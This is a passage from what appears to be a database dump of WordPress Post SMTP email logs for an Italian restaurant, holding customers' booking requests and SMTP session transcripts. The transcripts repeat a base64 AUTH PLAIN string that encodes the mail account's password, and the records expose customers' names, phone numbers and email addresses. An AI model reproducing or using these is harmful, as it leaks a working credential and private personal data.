cortesia.\r\nSaluti.\r\nPaolo\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21113,1025,'original_headers','From: Paolo Barchi <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: barchi@libero.it\n'),(21114,1025,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 22 Jun 2020 12:15:36 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Paolo Barchi <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: barchi@libero.it\r\nMessage-Id: <1640fb6db5ade898b40d0a20acbad123@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Richiesta prenotazione\"\r\nDate: Mon, 22 Jun 2020 16:15:36 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Paolo Barchi <barchi@libero.it>=0ATelefono: 3356113164=0AOggetto: Ri=\r\nchiesta prenotazione=0A=0ACorpo del messaggio:=0ABuonasera, son un vostr=\r\no affezionato e ultraventennale Cliente!=0D=0AMi farebbe molto piacere c=\r\nenare presso di voi sabato sera, insieme a mia Moglie e mia Figlia.=0D=\r\n=0AE=E2=80=99 possibile riservare un tavolo?=0D=0AVi ringrazio per la co=\r\nrtesia.=0D=0ASaluti.=0D=0APaolo=0A=0AAccettato=0A=0A--=0AQuesta e-mail=\r\n =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (https://www=\r\n..ristorantesolymar.it)\r\n.\r\n250 OK id=1jnP6e-0008CI-2j\r\n'),(21115,1026,'success','1'),(21116,1026,'from_header','Alessia <notifiche@ristorantesolymar.it>'),(21117,1026,'to_header','teosphone@gmail.com'),(21118,1026,'reply_to_header','alessia.settembrino@live.it'),(21119,1026,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21120,1026,'original_to','teosphone@gmail.com'),(21121,1026,'original_subject','Da sito Sol Y Mar: \"Prenotazione tavoli per 2\"'),(21122,1026,'original_message','Da: Alessia <alessia.settembrino@live.it>\nTelefono: 3404222305\nOggetto: Prenotazione tavoli per 2\n\nCorpo del messaggio:\nSalve vorrei prenotare un tavolo per sabato 27 giugno la sera per le 20/20.30 o 21\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21123,1026,'original_headers','From: Alessia <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: alessia.settembrino@live.it\n'),(21124,1026,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 24 Jun 2020 11:59:59 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Alessia <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: alessia.settembrino@live.it\r\nMessage-Id: <0ef7a49e786cd47b5bd353e41ba17983@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione tavoli per 2\"\r\nDate: Wed, 24 Jun 2020 15:59:59 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Alessia <alessia.settembrino@live.it>=0ATelefono: 3404222305=0AOgget=\r\nto: Prenotazione tavoli per 2=0A=0ACorpo del messaggio:=0ASalve vorrei p=\r\nrenotare un tavolo per sabato 27 giugno la sera per le 20/20.30 o 21=0A=\r\n=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo d=\r\ni contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1jo7od-0001Je-Sw\r\n'),(21125,1027,'success','1'),(21126,1027,'from_header','Olmi <notifiche@ristorantesolymar.it>'),(21127,1027,'to_header','teosphone@gmail.com'),(21128,1027,'reply_to_header','monymio@gmail.com'),(21129,1027,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21130,1027,'original_to','teosphone@gmail.com'),(21131,1027,'original_subject','Da sito Sol Y Mar: \"Info\"'),(21132,1027,'original_message','Da: Olmi <monymio@gmail.com>\nTelefono: 3342711824\nOggetto: Info\n\nCorpo del messaggio:\nSalve vorrei prenotare per Sabato 27 giugno di sera per due persone. Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21133,1027,'original_headers','From: Olmi <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: monymio@gmail.com\n'),(21134,1027,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 25 Jun 2020 07:13:18 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Olmi <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: monymio@gmail.com\r\nMessage-Id: <dfc973c156081274cfb347f4b3c0b6b9@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Info\"\r\nDate: Thu, 25 Jun 2020 11:13:18 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Olmi <monymio@gmail.com>=0ATelefono: 3342711824=0AOggetto: Info=0A=\r\n=0ACorpo del messaggio:=0ASalve vorrei prenotare per Sabato 27 giugno di=\r\n sera per due persone. Grazie=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=\r\n=A8 stata inviata da un modulo di contatto su Sol Y Mar (https://www.ris=\r\ntorantesolymar.it)\r\n.\r\n250 OK id=1joPok-00061Y-7v\r\n'),(21135,1028,'success','1'),(21136,1028,'from_header','Fabio <notifiche@ristorantesolymar.it>'),(21137,1028,'to_header','teosphone@gmail.com'),(21138,1028,'reply_to_header','effemasai@gmail.com'),(21139,1028,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21140,1028,'original_to','teosphone@gmail.com'),(21141,1028,'original_subject','Da sito Sol Y Mar: \"Prenotazione ristorante Dove posti per la cena del 25 giugno 2020 giovedì\"'),(21142,1028,'original_message','Da: Fabio <effemasai@gmail.com>\nTelefono: 3391147450\nOggetto: Prenotazione ristorante Dove posti per la cena del 25 giugno 2020 giovedì\n\nCorpo del messaggio:\nStiamo cercando di contattarvi al telefono per prenotare due posti per la cena di questa sera giovedì 25 giugno 2020. Nessuno risponde. Come possibile farlo? Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21143,1028,'original_headers','From: Fabio <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: effemasai@gmail.com\n'),(21144,1028,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 25 Jun 2020 07:29:44 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Fabio <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: effemasai@gmail.com\r\nMessage-Id: <450ee93d244bd86dfc0b7268ef0fc472@ristorantesolymar.it>\r\nSubject: =?UTF-8?Q?Da=20sito=20Sol=20Y=20Mar:=20\"Prenotazione=20ristorante=20?=\r\n =?UTF-8?Q?Dove=20posti=20per=20la=20cena=20del=2025=20giugno=20?=\r\n =?UTF-8?Q?2020=20gioved=C3=AC\"?=\r\nDate: Thu, 25 Jun 2020 11:29:44 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Fabio <effemasai@gmail.com>=0ATelefono: 3391147450=0AOggetto: Prenot=\r\nazione ristorante Dove posti per la cena del 25 giugno 2020 gioved=C3=AC=\r\n=0A=0ACorpo del messaggio:=0AStiamo cercando di contattarvi al telefono=\r\n per prenotare due posti per la cena di questa sera gioved=C3=AC 25 giug=\r\nno 2020. Nessuno risponde. Come possibile farlo? Grazie=0A=0AAccettato=\r\n=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di contatto s=\r\nu Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1joQ4e-0007P9-NV\r\n'),(21145,1029,'success','1'),(21146,1029,'from_header','Andrea <notifiche@ristorantesolymar.it>'),(21147,1029,'to_header','teosphone@gmail.com'),(21148,1029,'reply_to_header','andre.varia@gmail.com'),(21149,1029,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21150,1029,'original_to','teosphone@gmail.com'),(21151,1029,'original_subject','Da sito Sol Y Mar: \"Richiesta prenotazione per 2 27 giugno\"'),(21152,1029,'original_message','Da: Andrea <andre.varia@gmail.com>\nTelefono: 3426741422\nOggetto: Richiesta prenotazione per 2 27 giugno\n\nCorpo del messaggio:\nBuonasera chiedo disponibilità per 2 persone sabato 27 giugno cena intorno alle 2030.\r\nGrazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21153,1029,'original_headers','From: Andrea <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: andre.varia@gmail.com\n'),(21154,1029,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 25 Jun 2020 15:02:32 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Andrea <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: andre.varia@gmail.com\r\nMessage-Id: <e4b2ad59b35cdcbe2818d274aeed31d7@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Richiesta prenotazione per 2 27 giugno\"\r\nDate: Thu, 25 Jun 2020 19:02:32 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Andrea <andre.varia@gmail.com>=0ATelefono: 3426741422=0AOggetto: Ric=\r\nhiesta prenotazione per 2 27 giugno=0A=0ACorpo del messaggio:=0ABuonaser=\r\na chiedo disponibilit=C3=A0 per 2 persone sabato 27 giugno cena intorno=\r\n alle 2030.=0D=0AGrazie=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 st=\r\nata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorant=\r\nesolymar.it)\r\n.\r\n250 OK id=1joX8q-0003NA-O7\r\n'),(21155,1030,'success','1'),(21156,1030,'from_header','Gianluca Magro <notifiche@ristorantesolymar.it>'),(21157,1030,'to_header','teosphone@gmail.com'),(21158,1030,'reply_to_header','g.magro@giornaledibrescia.it'),(21159,1030,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21160,1030,'original_to','teosphone@gmail.com'),(21161,1030,'original_subject','Da sito Sol Y Mar: \"Info per prenotazione\"'),(21162,1030,'original_message','Da: Gianluca Magro <g.magro@giornaledibrescia.it>\nTelefono: 3356814182\nOggetto: Info per prenotazione\n\nCorpo del messaggio:\nBuonasera mi chiamo Gianluca Magro e vi scrivo da Brescia. Vorrei sapere se siete aperti e se sì  se sia possibile prenotare un tavolo per due persone a cena questa domenica, 28 giugno. Orario 20.45. Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21163,1030,'original_headers','From: Gianluca Magro <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: g.magro@giornaledibrescia.it\n'),(21164,1030,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 26 Jun 2020 10:01:32 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Gianluca Magro <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: g.magro@giornaledibrescia.it\r\nMessage-Id: <8bec473c110b2d19441b15398dd0d5e5@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Info per prenotazione\"\r\nDate: Fri, 26 Jun 2020 14:01:32 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Gianluca Magro <g.magro@giornaledibrescia.it>=0ATelefono: 3356814182=\r\n=0AOggetto: Info per prenotazione=0A=0ACorpo del messaggio:=0ABuonasera=\r\n mi chiamo Gianluca Magro e vi scrivo da Brescia. Vorrei sapere se siete=\r\n aperti e se s=C3=AC  se sia possibile prenotare un tavolo per due perso=\r\nne a cena questa domenica, 28 giugno. Orario 20.45. Grazie=0A=0AAccettat=\r\no=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di contatto=\r\n su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1joov6-0000Oh-KI\r\n'),(21165,1031,'success','1'),(21166,1031,'from_header','Rita Sberlati <notifiche@ristorantesolymar.it>'),(21167,1031,'to_header','teosphone@gmail.com'),(21168,1031,'reply_to_header','ritasberlati@gmail.com'),(21169,1031,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21170,1031,'original_to','teosphone@gmail.com'),(21171,1031,'original_subject','Da sito Sol Y Mar: \"Prenotzzione\"'),(21172,1031,'original_message','Da: Rita Sberlati <ritasberlati@gmail.com>\nTelefono: 3356114173\nOggetto: Prenotzzione\n\nCorpo del messaggio:\nBuongiorno possibile prenotare per questa sera 26 giugno per 3 persone in esterno ? Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21173,1031,'original_headers','From: Rita Sberlati <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: ritasberlati@gmail.com\n'),(21174,1031,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 26 Jun 2020 10:22:33 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Rita Sberlati <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: ritasberlati@gmail.com\r\nMessage-Id: <370bc35195abf24dd5abb6ec53903aa3@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotzzione\"\r\nDate: Fri, 26 Jun 2020 14:22:33 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Rita Sberlati <ritasberlati@gmail.com>=0ATelefono: 3356114173=0AOgge=\r\ntto: Prenotzzione=0A=0ACorpo del messaggio:=0ABuongiorno possibile preno=\r\ntare per questa sera 26 giugno per 3 persone in esterno ? Grazie=0A=0AAc=\r\ncettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di con=\r\ntatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1jopFR-00020M-S0\r\n'),(21175,1032,'success','1'),(21176,1032,'from_header','ristorante a Riccione <webmaster@baldisserri.com>'),(21177,1032,'to_header','VaniJolla@belan.website'),(21178,1032,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21179,1032,'original_to','VaniJolla@belan.website'),(21180,1032,'original_subject','Conferma d\'iscrizione'),(21181,1032,'original_message','<!doctype html>\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:v=\"urn:schemas-microsoft-com:vml\" xmlns:o=\"urn:schemas-microsoft-com:office:office\">\n    <head>\n        <title>Per favore conferma la tua iscrizione</title>\n        <!--[if !mso]><!-- -->\n        <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n            <!--<![endif]-->\n            <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n                <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n                    <style type=\"text/css\">\n                        #outlook a { padding: 0; }\n                        .ReadMsgBody { width: 100%; }\n                        .ExternalClass { width: 100%; }\n                        .ExternalClass * { line-height:100%; }\n                        body { margin: 0; padding: 0; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; }\n                        table, td { border-collapse:collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt; }\n                        img { border: 0; height: auto; line-height: 100%; outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; }\n                        p { display: block; margin: 13px 0; }\n                    </style>\n                    <!--[if !mso]><!-->\n                    <style type=\"text/css\">\n                        @media only screen and (max-width:480px) {\n                            @-ms-viewport { width:320px; }\n                            @viewport { width:320px; }\n                        }\n                    </style>\n                    <!--<![endif]-->\n                    <!--[if mso]>\n                    <xml>\n                      <o:OfficeDocumentSettings>\n                        <o:AllowPNG/>\n                        <o:PixelsPerInch>96</o:PixelsPerInch>\n                      </o:OfficeDocumentSettings>\n                    </xml>\n                    <![endif]-->\n                    <!--[if lte mso 11]>\n                    <style type=\"text/css\">\n                      .outlook-group-fix {\n                        width:100% !important;\n                      }\n                    </style>\n                    <![endif]-->\n                    <style type=\"text/css\">\n                        @media only screen and (min-width:480px) {\n                            .mj-column-per-100 { width:100%!important; }\n                        }\n                    </style>\n                    </head>\n                    <body style=\"background: #F4F4F4;\">\n\n                        <div class=\"mj-container\" style=\"background-color:#F4F4F4;\"><!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px;\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px;mso-line-height-rule:exactly;\">\n                            <![endif]--><div style=\"margin:0px auto;max-width:600px;\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%;\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px 20px 0px;padding-bottom:0px;padding-top:0px;\"><!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px;\">\n                            <![endif]--><div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;display:inline-block;direction:ltr;font-size:13px;text-align:left;width:100%;\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\"><tbody><tr><td style=\"word-wrap:break-word;font-size:0px;\"><div style=\"font-size:1px;line-height:40px;white-space:nowrap;\"> </div></td></tr></tbody></table></div><!--[if mso | IE]>\n                            </td></tr></table>\n                            <![endif]--></td></tr></tbody></table></div><!--[if mso | IE]>\n                            </td></tr></table>\n                            <![endif]-->\n                            <!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px;\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px;mso-line-height-rule:exactly;\">\n                            <![endif]--><div style=\"margin:0px auto;max-width:600px;background:#ffffff;\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%;background:#ffffff;\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px;\"><!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px;\">\n                            <![endif]--><div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;display:inline-block;direction:ltr;font-size:13px;text-align:left;width:100%;\">\n                                                    <table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\">\n                                                        <tbody>\n                                                            <tr>\n                                                                <td style=\"word-wrap:break-word;font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:20px;\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left;\">\n                                                                        <h1 style=\"font-family: \'Trebuchet MS\', Helvetica, Arial, sans-serif; font-size: 28px; font-weight: normal; line-height: 32px;\"><b><span style=\"font-family:Arial,sans-serif\">Per favore conferma la tua iscrizione</span></b></h1>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"word-wrap:break-word;font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:0px;\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left;\">\n                                                                        <p style=\"font-size: 15px; margin: 10px 0;\">\n                                                                            Per ricevere le newsletter a partire da <a href=\"https://www.ristorantesolymar.it\" target=\"_blank\">https://www.ristorantesolymar.it</a>, conferma la tua iscrizione cliccando sul seguente pulsante:\n                                                                            <!--                                                        To receive newsletters from: \n                                                                                                                                    <a target=\"_blank\" href=\"<a 